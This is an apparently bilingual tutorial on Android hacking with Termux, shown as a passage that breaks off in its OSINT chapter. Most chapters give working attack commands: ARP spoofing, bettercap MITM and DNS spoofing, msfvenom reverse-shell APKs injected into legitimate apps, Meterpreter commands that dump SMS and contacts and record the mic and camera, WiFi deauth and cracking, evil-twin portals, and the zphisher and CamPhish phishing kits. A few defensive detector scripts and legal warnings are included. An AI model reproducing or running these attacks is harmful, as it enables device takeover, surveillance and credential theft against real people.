📱

Android Hacking (Termux-based)

Android Hacking with Termux — Complete Bilingual Guide

Using just an Android phone — Network attacks, APK Analysis, Metasploit, WiFi testing, Post Exploitation and much more.

📋 Table of Contents — Full List

01 Android Hacking Intro & Legal Aspects
   What you'll learn, why learn it, ethics & legal warnings
02 Termux Setup & Essential Tools
   Termux install, pkg system, storage, Python, Go, Ruby setup
   Nethunter, Kali-Termux, Andronix, proot-distro
03 Android Architecture & Security Model
   Linux Kernel, Binder IPC, SELinux, Sandbox, Permissions
   ADB (Android Debug Bridge): complete guide
04 Network Attacks — MITM, ARP Spoofing
   nmap, netdiscover, arpspoof, bettercap, tcpdump, Wireshark
   SSL Stripping, DNS Spoofing, HTTP Sniffing
05 APK Analysis & Reverse Engineering
   apktool, jadx, dex2jar, MobSF: decompiling APKs
   Hardcoded secrets, API keys, manifest analysis
06 Metasploit in Termux — Android Exploitation
   Metasploit install, msfvenom payload, msfconsole, sessions
   Android APK backdoor, Reverse Shell, Meterpreter
07 WiFi Hacking — Wireless Attacks
   aircrack-ng, wifite, hashcat — WPA/WPA2 crack
   Evil Twin, Deauth Attack, WPS Pin Attack
08 Phishing & Social Engineering
   zphisher, SocialFish, ngrok, cloudflared — credential harvest
   SMS Spoofing, QR Code Phishing, Smishing
09 OSINT — Information Gathering
   theHarvester, maltego, shodan, sherlock, holehe
   Phone OSINT, Email OSINT, Social Media OSINT
10 Password Attacks
   hydra, medusa, hashcat, john — brute force & cracking
   Wordlist generation, CeWL, cupp, crunch
11 Post Exploitation — After Getting Access
   Privilege Escalation, Persistence, Data Exfiltration
   Covering Tracks, Keylogger, Screenshot, Camera Access
12 Android Security Hardening — Protect Yourself
   Secure Android phone, unknown APKs, VPN, firewall
13 CTF Practice & Lab Setup
   HackTheBox Android, DIVA, InsecureBankv2, MSTG Crackmes
14 Career Path, Resources & Cheat Sheet
   Complete Termux Cheat Sheet, Resources & Career Guide

Chapter 01
📱 Android Hacking Intro & Legal Aspects
What you'll learn, why learn it, proper ethics and legal warnings

🤔 What is Android Hacking?

Android Hacking means finding and understanding security weaknesses in Android devices and applications. Termux is a Linux Terminal Emulator for Android that allows you to use professional hacking tools — even without root.

💡 Why Termux?
Even without a laptop, you can do full penetration testing with just an Android phone. nmap, metasploit, sqlmap, hydra — all run in Termux.

⚖️ Legal & Ethical Warnings

🚨 Extremely Important
Hacking someone's device, network, or system without permission is a cybercrime. In Bangladesh this falls under the Digital Security Act 2018, with severe penalties. Only practice on your own device, your own lab, or CTF challenges.

Where It's Allowed

  • Your own Android device & network
  • CTF challenges (HackTheBox, TryHackMe)
  • Vulnerable apps (DIVA, InsecureBank)
  • Bug Bounty Programs (authorized)
  • Home Lab environment

Never Do This

  • Hack someone else's WiFi
  • MITM on public networks
  • Create APK backdoors without permission
  • Attack real targets

🎯 What You'll Learn in This Guide

📡 Network

MITM, ARP Spoofing, DNS Spoofing, Packet Sniffing, SSL Strip

📲 APK

Decompile, Reverse Engineer, Find secrets, Modify APK

💣 Exploitation

Metasploit, Payloads, Reverse Shell, Meterpreter sessions

📱 Chapter Summary

  • 📱 Professional hacking tools can run via Termux
  • ⚖️ Only practice in your own lab or CTF
  • 🎓 This guide is entirely for educational purposes

Chapter 02
⚙️ Termux Setup & Essential Tools
From Termux to Kali Linux — complete environment setup guide

📥 Termux Install & First Setup

⚠️ Important
Termux on Google Play is outdated. Always download Termux from F-Droid. f-droid.org → Termux.

    # Do this the first time you open Termux
    pkg update && pkg upgrade -y

    # Essential packages
    pkg install -y git curl wget python python-pip \
        nodejs ruby golang openssh nmap \
        net-tools iproute2 dnsutils

    # Grant storage permission
    termux-setup-storage

    # Python pip update
    pip install --upgrade pip

    # Go environment setup
    export GOPATH=$HOME/go
    export PATH=$PATH:$GOPATH/bin
    echo 'export GOPATH=$HOME/go' >> ~/.bashrc
    echo 'export PATH=$PATH:$GOPATH/bin' >> ~/.bashrc

🐉 Kali Linux in Termux (proot-distro)

Using proot-distro, you can run a full Kali Linux inside Termux — even without root.

    # Install proot-distro
    pkg install proot-distro

    # Install Kali Linux (500MB+ download)
    proot-distro install kali

    # Log in to Kali Linux
    proot-distro login kali

    # Inside Kali, install the tools
    apt update && apt upgrade -y
    apt install -y nmap metasploit-framework sqlmap \
        hydra nikto gobuster subfinder \
        aircrack-ng john hashcat

    # To leave Kali
    exit

🔧 Essential Tool Installation

    # Metasploit (directly in Termux)
    # Read the downloaded script before executing it
    curl https://raw.githubusercontent.com/Hax4us/Metasploit_termux/master/metasploit.sh -o metasploit.sh
    chmod +x metasploit.sh && ./metasploit.sh

    # SQLmap
    pip install sqlmap
    # or
    git clone https://github.com/sqlmapproject/sqlmap.git
    cd sqlmap && python sqlmap.py --version

    # Hydra (password brute force)
    pkg install hydra

    # Nmap
    pkg install nmap

    # Netcat
    pkg install netcat-openbsd

    # theHarvester (OSINT)
    pip install theHarvester

    # Sherlock (username OSINT)
    git clone https://github.com/sherlock-project/sherlock.git
    cd sherlock && pip install -r requirements.txt

📂 Understanding Termux File System

    Termux Home Directory:  /data/data/com.termux/files/home (~)
    Termux Prefix:          /data/data/com.termux/files/usr
    Android Storage:        ~/storage/shared (/sdcard)
    Downloads:              ~/storage/downloads

    Important paths:
    ~/storage/shared/     → the phone's internal storage
    ~/storage/downloads/  → Download folder
    ~/.bashrc             → Startup script (custom aliases)
    ~/.ssh/               → SSH keys

Useful Aliases Setup

    # Add these to ~/.bashrc
    nano ~/.bashrc

    # Add these aliases:
    alias kali='proot-distro login kali'
    alias update='pkg update && pkg upgrade -y'
    alias tools='ls ~/tools/'
    alias myip='curl ifconfig.me'
    alias localip='ip addr show | grep inet'
    alias scan='nmap -sV -sC'
    alias msf='cd ~/metasploit-framework && ruby msfconsole'

    # Apply the changes
    source ~/.bashrc

⚙️ Chapter Summary

  • 📥 Download Termux from F-Droid — not Play Store
  • 🐉 Run Kali Linux via proot-distro — no root needed
  • 🔧 nmap, metasploit, hydra, sqlmap — all run in Termux

Chapter 03
🏗️ Android Architecture & ADB
Understanding Android's internal structure and controlling devices with ADB

🏗️ Android Architecture

    ┌─────────────────────────────────────────────┐
    │             APPLICATIONS LAYER              │
    │   (Instagram, WhatsApp, Banking App, etc)   │
    ├─────────────────────────────────────────────┤
    │            APPLICATION FRAMEWORK            │
    │     (Activity Manager, Package Manager,     │
    │  Content Providers, Notification Manager)   │
    ├─────────────────────────────────────────────┤
    │     ANDROID RUNTIME + NATIVE LIBRARIES      │
    │      (ART/Dalvik JVM, WebKit, SQLite)       │
    ├─────────────────────────────────────────────┤
    │                LINUX KERNEL                 │
    │   (Drivers, Power Mgmt, SELinux, Binder)    │
    └─────────────────────────────────────────────┘

🔌 ADB — Android Debug Bridge

ADB is a communication tool between Android and a computer or another Android device. It's extremely powerful for hackers.

    # Install ADB in Termux
    pkg install android-tools

    # Connect a device (USB or WiFi)
    adb devices                          # list connected devices
    adb connect 192.168.1.100:5555       # WiFi ADB

    # File operations
    adb push local_file.txt /sdcard/     # send a file to the phone
    adb pull /sdcard/file.txt ./         # fetch a file from the phone

    # Shell access
    adb shell                            # interactive shell
    adb shell ls /data/data/             # app data (root needed)
    adb shell dumpsys battery            # system info

    # APK Management
    adb install app.apk                  # install APK
    adb uninstall com.package.name       # uninstall app
    adb shell pm list packages           # list all apps
    adb shell pm list packages -3        # third-party apps only

    # Screen capture
    adb shell screencap /sdcard/screen.png
    adb pull /sdcard/screen.png ./

    # Network info
    adb shell netstat -an
    adb shell ip addr show

🔒 Android Security Model

🛡️ Security Features

  • SELinux: Mandatory Access Control
  • Sandbox: Each app isolated
  • Permissions: Runtime permission system
  • Keystore: Hardware-backed key storage
  • Play Protect: Malware detection

⚠️ Common Weaknesses

  • Hardcoded API keys in APK
  • Insecure data storage (/sdcard)
  • Unencrypted SQLite databases
  • Exported Activities/Services
  • Insecure WebView implementations
  • Weak SSL/TLS certificate validation

🏗️ Chapter Summary

  • 🔌 ADB = Android Hacker's Swiss Army Knife
  • 🏗️ Knowing Android architecture shows where to look for bugs
  • 🔒 SELinux + Sandbox — hard to break, but misconfig is easy

Chapter 04
🌐 Network Attacks — MITM, ARP Spoofing
Attacking local networks — network hacking with Termux

🗺️ Network Scanning

    # Find your own IP
    ip addr show wlan0
    ifconfig wlan0

    # Find all devices on the network (nmap)
    nmap -sn 192.168.1.0/24                  # Host discovery
    nmap -sV -sC 192.168.1.100               # Service detection
    nmap -p- --min-rate 5000 192.168.1.100   # All ports
    nmap -O 192.168.1.100                    # OS detection

    # netdiscover (ARP-based discovery)
    pkg install netdiscover
    netdiscover -r 192.168.1.0/24

    # Output example:
    192.168.1.1     00:11:22:33:44:55   Router (TP-Link)
    192.168.1.100   AA:BB:CC:DD:EE:FF   Samsung Galaxy
    192.168.1.101   11:22:33:44:55:66   HP Laptop

🎭 ARP Spoofing & MITM Attack

⚠️ Only test on your own network
ARP Spoofing routes network traffic through your device. Only do this in your own lab.

    # Install arpspoof
    pkg install dsniff

    # Enable IP forwarding
    echo 1 > /proc/sys/net/ipv4/ip_forward   # (may need root)
    sysctl -w net.ipv4.ip_forward=1

    # Start ARP spoofing (in two terminals)
    # Terminal 1: tell the router you are the victim
    arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1
    # Terminal 2: tell the victim you are the router
    arpspoof -i wlan0 -t 192.168.1.1 192.168.1.100

    # Packet sniffing (tcpdump)
    tcpdump -i wlan0 -w capture.pcap
    tcpdump -i wlan0 host 192.168.1.100
    tcpdump -i wlan0 port 80 -A              # HTTP traffic (plaintext)
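
Seen from the defending side, ARP spoofing leaves a trace in a host's neighbour table: the gateway's IP starts resolving to another device's MAC address. The script below is an added example, not part of the original guide; it parses the text output of `ip neigh show`, and its function names and both sample tables (built from the lab addresses used on this page) are constructed for illustration.

```python
import re
from collections import defaultdict

# One resolved IPv4 line of `ip neigh show`, for example:
#   192.168.1.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE
NEIGH_RE = re.compile(
    r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+dev\s+(?P<dev>\S+)"
    r"\s+lladdr\s+(?P<mac>(?:[0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2})\b"
)

# Constructed sample: a healthy table on the lab network.
CLEAN_TABLE = """\
192.168.1.1 dev wlan0 lladdr 00:11:22:33:44:55 REACHABLE
192.168.1.100 dev wlan0 lladdr aa:bb:cc:dd:ee:ff STALE
192.168.1.101 dev wlan0 lladdr 11:22:33:44:55:66 STALE
192.168.1.50 dev wlan0 FAILED
"""

# Constructed sample: the same network while 192.168.1.101 answers
# ARP requests for the gateway address.
SPOOFED_TABLE = """\
192.168.1.1 dev wlan0 lladdr 11:22:33:44:55:66 REACHABLE
192.168.1.101 dev wlan0 lladdr 11:22:33:44:55:66 REACHABLE
192.168.1.50 dev wlan0 INCOMPLETE
"""


def parse_neighbors(text):
    """Return {ip: mac}; unresolved (FAILED/INCOMPLETE) entries are skipped."""
    table = {}
    for line in text.splitlines():
        match = NEIGH_RE.match(line.strip())
        if match:
            table[match.group("ip")] = match.group("mac").lower()
    return table


def find_arp_anomalies(table, gateway_ip, baseline_gateway_mac=None):
    """Report MACs claimed by several IPs and a gateway MAC that differs
    from a baseline recorded while the network was known to be clean.

    A duplicate MAC is a lead, not proof: proxy ARP and multi-address
    hosts produce it legitimately. The gateway check is the stronger signal.
    """
    findings = []
    ips_by_mac = defaultdict(list)
    for ip, mac in table.items():
        ips_by_mac[mac].append(ip)
    for mac, ips in sorted(ips_by_mac.items()):
        if len(ips) > 1:
            findings.append(("duplicate_mac", mac, sorted(ips)))

    gateway_mac = table.get(gateway_ip)
    if (baseline_gateway_mac and gateway_mac
            and gateway_mac != baseline_gateway_mac.lower()):
        findings.append(("gateway_mac_changed", gateway_mac, [gateway_ip]))
    return findings


if __name__ == "__main__":
    for name, text in (("clean", CLEAN_TABLE), ("spoofed", SPOOFED_TABLE)):
        result = find_arp_anomalies(
            parse_neighbors(text), "192.168.1.1", "00:11:22:33:44:55")
        print(name, result)
```

On a real host, feed it the output of `ip neigh show` and a gateway MAC recorded earlier from the router's label or admin page.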

🔧 Bettercap — Powerful MITM Tool

    # Install Bettercap (Kali in Termux)
    apt install bettercap

    # Bettercap interactive mode
    bettercap -iface wlan0

    # Bettercap commands:
    net.probe on                          # start network scan
    net.show                              # show all devices
    set arp.spoof.targets 192.168.1.100
    arp.spoof on                          # start MITM
    net.sniff on                          # start traffic capture
    http.proxy on                         # enable HTTP proxy
    https.proxy on                        # HTTPS proxy (SSL strip)

    # Credential harvesting
    set net.sniff.verbose true
    set net.sniff.filter "port 80 or port 443"

📡 DNS Spoofing

    # Create the DNS spoofing config file
    cat > dns_spoof.conf << 'EOF'
    *.facebook.com 192.168.1.X   # Attacker IP
    *.google.com 192.168.1.X
    EOF

    # DNS spoof in Bettercap
    set dns.spoof.domains facebook.com,google.com
    set dns.spoof.address 192.168.1.X     # Your IP
    dns.spoof on

🌐 Chapter Summary

  • 🗺️ Scan networks with nmap — find all devices
  • 🎭 ARP Spoof = route traffic through you
  • 🔧 Bettercap = best MITM framework

Chapter 05
📲 APK Analysis & Reverse Engineering
See what's inside Android apps — find hidden secrets

🔍 What is an APK and How Does It Work?

    APK File Structure:

    app.apk (actually a ZIP file)
    ├── AndroidManifest.xml   ← Permissions, Components, Export
    ├── classes.dex           ← Compiled Java/Kotlin code
    ├── res/                  ← Resources (images, strings)
    ├── assets/               ← Raw files (often has API keys!)
    ├── lib/                  ← Native .so libraries
    └── META-INF/             ← Signature files

🛠️ Decompiling an APK — apktool

    # Install apktool
    pkg install apktool
    # or
    pip install apktool

    # Decompile the APK
    apktool d app.apk -o output_folder

    # Decompiled Structure:
    output_folder/
    ├── AndroidManifest.xml        ← Read this first!
    ├── smali/                     ← Decompiled code (Smali bytecode)
    ├── res/
    │   ├── values/strings.xml     ← API keys live here!
    │   └── raw/
    └── assets/                    ← Hardcoded credentials!

    # What to look for in AndroidManifest.xml
    cat output_folder/AndroidManifest.xml | grep -i "exported\|permission\|debuggable"

    # Search for sensitive strings
    grep -ri "api_key\|apikey\|password\|secret\|token\|aws\|firebase" output_folder/
    grep -ri "http://\|https://" output_folder/res/values/strings.xml

☕ jadx — Viewing Java Code

    # Install jadx (Termux/Kali)
    apt install jadx   # on Kali
    # or download it from GitHub
    wget https://github.com/skylot/jadx/releases/latest/download/jadx-1.5.0.zip
    unzip jadx-1.5.0.zip -d jadx/

    # Extract Java code from the APK
    jadx -d output_dir app.apk

    # Find interesting classes
    find output_dir -name "*.java" | xargs grep -l "password\|secret\|key"

    # Find network calls
    grep -r "OkHttp\|Retrofit\|HttpURLConnection\|URL(" output_dir/ | head -20

    # Find Firebase config
    grep -r "firebaseapp\|firebase\|google-services" output_dir/

📋 AndroidManifest.xml Analysis

    # Check dangerous permissions
    grep -E "READ_SMS|READ_CONTACTS|ACCESS_FINE_LOCATION|CAMERA|RECORD_AUDIO" \
        AndroidManifest.xml

    # Exported Activities (access without auth!)
    grep 'android:exported="true"' AndroidManifest.xml

    # Debuggable app (major security flaw)
    grep 'android:debuggable="true"' AndroidManifest.xml

    # Launch an exported Activity with ADB
    adb shell am start -n com.package/.ExportedActivity

    # Test a Content Provider
    adb shell content query --uri content://com.package.provider/data

🔐 Static Analysis Checklist

What to Check in APK Analysis
  • android:debuggable="true": Debug mode on?
  • android:allowBackup="true": Backup allowed?
  • Hardcoded API keys/passwords in strings.xml
  • Exported Activities and Services
  • HTTP (not HTTPS) endpoints
  • Insecure SSL/TLS (certificate pinning missing)
  • Sensitive data stored in SharedPreferences
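
The manifest items in this checklist can be checked structurally instead of with grep, which also catches components that are exported implicitly through an intent filter and a missing `allowBackup` attribute (it defaults to true). This is an added example, not code from the original guide; it expects the plain-XML manifest that apktool writes, and the `com.example.lab` manifest and all function names are constructed for illustration.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
A = "{%s}" % ANDROID_NS  # attribute prefix as ElementTree spells it
COMPONENT_TAGS = ("activity", "activity-alias", "service", "receiver", "provider")
# The permissions this page's grep looks for.
SENSITIVE_PERMS = {"READ_SMS", "READ_CONTACTS", "ACCESS_FINE_LOCATION",
                   "CAMERA", "RECORD_AUDIO"}

# Constructed sample manifest (not taken from any real app).
SAMPLE_MANIFEST = """\
<?xml version="1.0" encoding="utf-8" standalone="no"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.lab">
  <uses-permission android:name="android.permission.INTERNET"/>
  <uses-permission android:name="android.permission.READ_SMS"/>
  <application android:debuggable="true" android:label="Lab">
    <activity android:name=".MainActivity" android:exported="true">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".AdminActivity" android:exported="true"/>
    <service android:name=".SyncService">
      <intent-filter><action android:name="com.example.lab.SYNC"/></intent-filter>
    </service>
    <provider android:name=".NotesProvider"
              android:authorities="com.example.lab.provider"
              android:exported="true"
              android:permission="com.example.lab.READ_NOTES"/>
    <receiver android:name=".BootReceiver" android:exported="false"/>
  </application>
</manifest>
"""


def _is_launcher(component):
    """The MAIN/LAUNCHER activity has to be exported, so it is not a finding."""
    for flt in component.findall("intent-filter"):
        actions = {a.get(A + "name") for a in flt.findall("action")}
        cats = {c.get(A + "name") for c in flt.findall("category")}
        if ("android.intent.action.MAIN" in actions
                and "android.intent.category.LAUNCHER" in cats):
            return True
    return False


def audit_manifest(xml_text):
    """Return a list of (finding, subject) tuples for a decoded manifest."""
    # A manifest never needs a DTD; refuse one rather than expand entities
    # from an untrusted file.
    if "<!DOCTYPE" in xml_text or "<!ENTITY" in xml_text:
        raise ValueError("unexpected DTD/entity declaration in manifest")
    root = ET.fromstring(xml_text.lstrip())
    findings = []

    for perm in root.findall("uses-permission"):
        name = perm.get(A + "name", "")
        if name.rsplit(".", 1)[-1] in SENSITIVE_PERMS:
            findings.append(("sensitive-permission", name))

    app = root.find("application")
    if app is None:
        return findings
    if app.get(A + "debuggable") == "true":
        findings.append(("debuggable", "application"))
    if app.get(A + "allowBackup", "true") == "true":  # absent means true
        findings.append(("allow-backup", "application"))
    if app.get(A + "usesCleartextTraffic") == "true":
        findings.append(("cleartext-traffic", "application"))

    for comp in app:
        if comp.tag not in COMPONENT_TAGS:
            continue
        exported = comp.get(A + "exported")
        has_filter = comp.find("intent-filter") is not None
        # Before Android 12 an intent filter without an explicit
        # android:exported value made the component exported.
        is_exported = exported == "true" or (exported is None and has_filter)
        unprotected = comp.get(A + "permission") is None
        if is_exported and unprotected and not _is_launcher(comp):
            findings.append(("exported-unprotected", comp.get(A + "name")))
    return findings


if __name__ == "__main__":
    for finding in audit_manifest(SAMPLE_MANIFEST):
        print(finding)
```

A finding here is a prompt for review: an exported component may be intentional, and what matters is whether it validates its caller and input.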

📲 Chapter Summary

  • 🔍 APK = ZIP file — unzip it with apktool
  • Read Java code with jadx — search for API keys
  • 📋 AndroidManifest.xml = bug hunter's treasure chest

Chapter 06
💣 Metasploit in Termux — Android Exploitation
Creating Android APK backdoors, reverse shells, and Meterpreter sessions

🔴 Only Test on Your Own Device
All content in this chapter is educational only. Test on your own device or lab. Doing it on others' devices is a cybercrime.

⚙️ Metasploit Setup in Termux

    # Method 1: Kali in proot-distro
    proot-distro login kali
    apt install metasploit-framework
    msfconsole

    # Method 2: Direct Termux script
    pkg install unstable-repo
    pkg install metasploit

    # Metasploit Database setup
    msfdb init
    msfconsole

    # Basic msfconsole commands
    msf6 > help                        # show all commands
    msf6 > search android              # find Android modules
    msf6 > use exploit/multi/handler   # start a listener

🎭 msfvenom — Creating an Android APK Payload

    # Create an Android reverse shell APK
    msfvenom -p android/meterpreter/reverse_tcp \
        LHOST=192.168.1.X \
        LPORT=4444 \
        -o evil_app.apk

    # Inject a backdoor into a legitimate APK
    msfvenom -p android/meterpreter/reverse_tcp \
        LHOST=192.168.1.X \
        LPORT=4444 \
        -x original_app.apk \
        -o backdoored_app.apk

    # HTTPS payload (more stealthy)
    msfvenom -p android/meterpreter/reverse_https \
        LHOST=your_domain.com \
        LPORT=443 \
        -o secure_payload.apk

    # Stageless payload (no internet needed)
    msfvenom -p android/meterpreter_reverse_tcp \
        LHOST=192.168.1.X \
        LPORT=4444 \
        -o stageless.apk

🎧 Listener Setup — Getting a Session

    # Start a listener in msfconsole
    msfconsole -q
    msf6 > use exploit/multi/handler
    msf6 exploit(handler) > set payload android/meterpreter/reverse_tcp
    msf6 exploit(handler) > set LHOST 192.168.1.X
    msf6 exploit(handler) > set LPORT 4444
    msf6 exploit(handler) > set ExitOnSession false
    msf6 exploit(handler) > exploit -j

    # When the victim installs the APK, a session arrives:
    [*] Started reverse TCP handler on 192.168.1.X:4444
    [*] Sending stage (65536 bytes) to 192.168.1.101
    [*] Meterpreter session 1 opened

    # Enter the session
    msf6 > sessions -l     # list all sessions
    msf6 > sessions -i 1   # enter session 1

🔮 Meterpreter Commands — Android Control

    # System Information
    meterpreter > sysinfo          # Device info
    meterpreter > getuid           # Current user
    meterpreter > pwd              # Current directory

    # File System
    meterpreter > ls               # List files
    meterpreter > download /sdcard/DCIM/photo.jpg ./
    meterpreter > upload local.txt /sdcard/

    # Android-specific commands
    meterpreter > dump_sms         # read SMS
    meterpreter > dump_contacts    # fetch contacts
    meterpreter > geolocate        # GPS location
    meterpreter > record_mic 10    # Microphone record (10 sec)
    meterpreter > webcam_snap      # Camera snap
    meterpreter > send_sms -d +8801XXXXXXXXX -t "Test"   # send SMS

    # Network
    meterpreter > ifconfig
    meterpreter > route
    meterpreter > portfwd add -l 8080 -p 80 -r 192.168.1.1

    # Shell access
    meterpreter > shell            # Android shell

💣 Chapter Summary

  • ⚙️ Kali in proot-distro = easy Metasploit
  • 🎭 msfvenom = tool for creating APK payloads
  • 🔮 Meterpreter = remote device control

Chapter 07
📡 WiFi Hacking — Wireless Attacks
WPA/WPA2 Crack, Evil Twin, Deauth — Wireless Network Security Testing

⚠️ WiFi Hacking Requires an External WiFi Adapter
Android's built-in WiFi doesn't support Monitor Mode. You need an external USB WiFi adapter (OTG) that supports Monitor Mode and Packet Injection. Example: Alfa AWUS036ACH.

📡 WiFi Reconnaissance

    # Find the WiFi interface
    ip link show
    iwconfig

    # Enable Monitor Mode
    airmon-ng start wlan0
    # The interface becomes wlan0mon

    # Scan nearby WiFi networks
    airodump-ng wlan0mon

    # Capture packets from a specific network
    airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF \
        -w capture wlan0mon
    # -c = channel, --bssid = Router MAC, -w = output file

    # Output:
    BSSID              PWR  CH  #Data  ESSID
    AA:BB:CC:DD:EE:FF  -60   6     12  HomeWiFi
    11:22:33:44:55:66  -75  11      5  OfficeNet

💥 WPA/WPA2 Handshake Capture & Crack

    # Deauth attack: disconnect the client (to obtain the handshake)
    aireplay-ng --deauth 10 -a AA:BB:CC:DD:EE:FF wlan0mon
    # The handshake is captured when the client reconnects

    # Handshake capture confirmation:
    [*] WPA handshake: AA:BB:CC:DD:EE:FF   ← success!

    # Crack with a dictionary attack
    aircrack-ng -w /usr/share/wordlists/rockyou.txt \
        -b AA:BB:CC:DD:EE:FF capture-01.cap

    # GPU crack with hashcat (faster)
    hcxdumptool -i wlan0mon -o capture.pcapng
    hcxpcapngtool -o hash.hc22000 capture.pcapng
    hashcat -m 22000 hash.hc22000 rockyou.txt

    # WPS Pin Attack (if WPS is enabled)
    wash -i wlan0mon                                # WPS-enabled networks
    reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv

😈 Evil Twin Attack

    # Create a fake Access Point
    # hostapd config file
    cat > fake_ap.conf << 'EOF'
    interface=wlan0
    driver=nl80211
    # Same name as victim AP
    ssid=HomeWiFi
    channel=6
    hw_mode=g
    EOF
    hostapd fake_ap.conf

    # Start the DHCP server
    dnsmasq --interface=wlan0 \
        --dhcp-range=192.168.2.2,192.168.2.100,255.255.255.0,12h \
        --no-daemon

    # Captive Portal (credential capture)
    # Simple Python HTTP server
    python3 -m http.server 80 --directory phishing_page/

📡 Chapter Summary

  • 📡 External WiFi adapter needed for monitor mode
  • 💥 aircrack-ng = WPA handshake capture and crack
  • 😈 Evil Twin = steal credentials with fake AP

Chapter 08
🎣 Phishing & Social Engineering
Creating phishing pages with Termux, URL tunneling, and credential harvesting

🔗 ngrok & cloudflared — Getting a Public URL

    # Install ngrok
    pkg install wget unzip
    wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-arm64.tgz
    tar xvzf ngrok-v3-stable-linux-arm64.tgz
    chmod +x ngrok && mv ngrok $PREFIX/bin/

    # Sign up for an ngrok account (free)
    ngrok config add-authtoken YOUR_TOKEN

    # Start an HTTP server
    python3 -m http.server 8080

    # Make it public with ngrok
    ngrok http 8080
    # Output: https://abc123.ngrok.io → localhost:8080

    # cloudflared (alternative, no account needed)
    pkg install cloudflared
    cloudflared tunnel --url http://localhost:8080

🎣 zphisher — Phishing Tool

    # Install zphisher
    git clone https://github.com/htr-tech/zphisher.git
    cd zphisher
    chmod +x zphisher.sh
    bash zphisher.sh

    # Select from the zphisher menu:
    01) Facebook    02) Instagram   03) Google
    04) Twitter     05) Netflix     06) PayPal
    07) Steam       08) TikTok      09) Spotify
    ...and many more...

    # You get the phishing URLs:
    URL 1: https://is.gd/xxxxxxx (Shortened)
    URL 2: https://abc123.ngrok.io (ngrok)

    # When the victim enters credentials:
    [*] Victim IP: 192.168.1.100
    [*] Username: victim@email.com
    [*] Password: password123

📱 Camphish — Getting Location via Camera

    # Install CamPhish
    git clone https://github.com/techchipnet/CamPhish.git
    cd CamPhish && bash camphish.sh

    # How it works:
    # 1. A fake webpage is created
    # 2. The link is sent to the victim
    # 3. Opening the page prompts for camera permission
    # 4. If permission is granted, a photo is taken and the GPS location is obtained

📧 How to Stay Safe from Phishing

🚨 How to Identify Phishing

  • Check if URL is correct (facebook.com vs faceb00k.com)
  • Check if HTTPS is present
  • Unexpected login pages are suspicious

🛡️ Ways to Stay Safe

  • Enable 2FA/MFA
  • Use a password manager
  • Don't click unknown links
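
The URL check above (facebook.com vs faceb00k.com) can be automated for a mail filter or a link-preview tool. The checker below is an added example, not part of the original guide; it goes beyond the single digit-for-letter case to cover one-character typos, a trusted name used as a subdomain of another domain, and missing HTTPS. The allowlist, the confusable-character table and the "last two labels" shortcut for the registrable domain are assumptions made for the example.

```python
from urllib.parse import urlsplit

# Sample allowlist (assumption); a deployment would load its own.
TRUSTED = {"facebook.com", "google.com", "instagram.com"}

# Visually confusable substitutions, applied to both sides before comparing.
CONFUSABLES = (("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"),
               ("3", "e"), ("5", "s"), ("-", ""))


def skeleton(domain):
    """Collapse look-alike characters so faceb00k.com and facebook.com match."""
    s = domain.lower()
    for src, dst in CONFUSABLES:
        s = s.replace(src, dst)
    return s


def edit_distance(a, b):
    """Levenshtein distance, used to catch one-character typos."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # deletion
                           cur[j - 1] + 1,              # insertion
                           prev[j - 1] + (ca != cb)))   # substitution
        prev = cur
    return prev[-1]


def classify_url(url, trusted=TRUSTED):
    """Return (verdict, detail) for a full URL including its scheme.

    Verdicts: trusted, trusted-no-https, lookalike, idn-review,
    unknown, invalid.
    """
    parts = urlsplit(url)
    host = (parts.hostname or "").rstrip(".").lower()
    if not host:
        return ("invalid", None)
    labels = host.split(".")
    # Simplification: the last two labels stand in for the registrable
    # domain. A production check would use the Public Suffix List.
    domain = ".".join(labels[-2:])

    if domain in trusted:
        verdict = "trusted" if parts.scheme == "https" else "trusted-no-https"
        return (verdict, domain)
    if any(label.startswith("xn--") for label in labels):
        # Punycode can hide non-Latin look-alikes; leave it to a human.
        return ("idn-review", host)
    for good in sorted(trusted):
        # A trusted name placed in front of somebody else's domain.
        if host.startswith(good + ".") or ("." + good + ".") in host:
            return ("lookalike", good)
        if skeleton(domain) == skeleton(good) or edit_distance(domain, good) == 1:
            return ("lookalike", good)
    return ("unknown", domain)


if __name__ == "__main__":
    for sample in ("https://www.facebook.com/login",
                   "https://faceb00k.com/login",
                   "https://facebook.com.account-verify.example/",
                   "http://google.com/"):
        print(sample, "->", classify_url(sample))
```

An "unknown" verdict only means the domain resembles nothing on the allowlist; it says nothing about whether the site is safe.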

🎣 Chapter Summary

  • 🔗 ngrok/cloudflared = give local server a public URL
  • 🎣 zphisher = ready-made phishing pages
  • 🛡️ 2FA + URL check = protection from phishing

Chapter 09
🕵️ OSINT — Information Gathering
Phone, Email, Username, and Social Media OSINT with Termux

🔍 Username OSINT — Sherlock

    # Sherlock: search a username on 400+ sites at once
    git clone https://github.com/sherlock-project/sherlock.git
    cd sherlock && pip install -r requirements.txt

    # Username search
    python3 sherlock username123

    # Multiple usernames
    python3 sherlock user1 user2 user3

    # Output:
    [+] Twitter: https://twitter.com/username123
    [+] Instagram: https://instagram.com/username123
    [+] GitHub: https://github.com/username123
    [+] Reddit: https://reddit.com/user/username123
    [-] Facebook: Not Found

📧 Email OSINT — holehe

    # holehe: which sites an email is registered on
    pip install holehe
    holehe target@email.com

    # Output:
    [+] google.com - Email used
    [+] facebook.com - Email used
    [+] twitter.com - Email used
    [-] github.com - Email not used
    [+] instagram.com - Email used

    # theHarvester: Email, Domain OSINT
    pip install theHarvester
    theHarvester -d target.com -b google,bing,linkedin

📱 Phone Number OSINT

    # phoneinfoga: Phone number OSINT
    pkg install golang
    go install github.com/sundowndev/phoneinfoga/v2/cmd/phoneinfoga@latest
    phoneinfoga scan -n "+8801XXXXXXXXX"

    # Output:
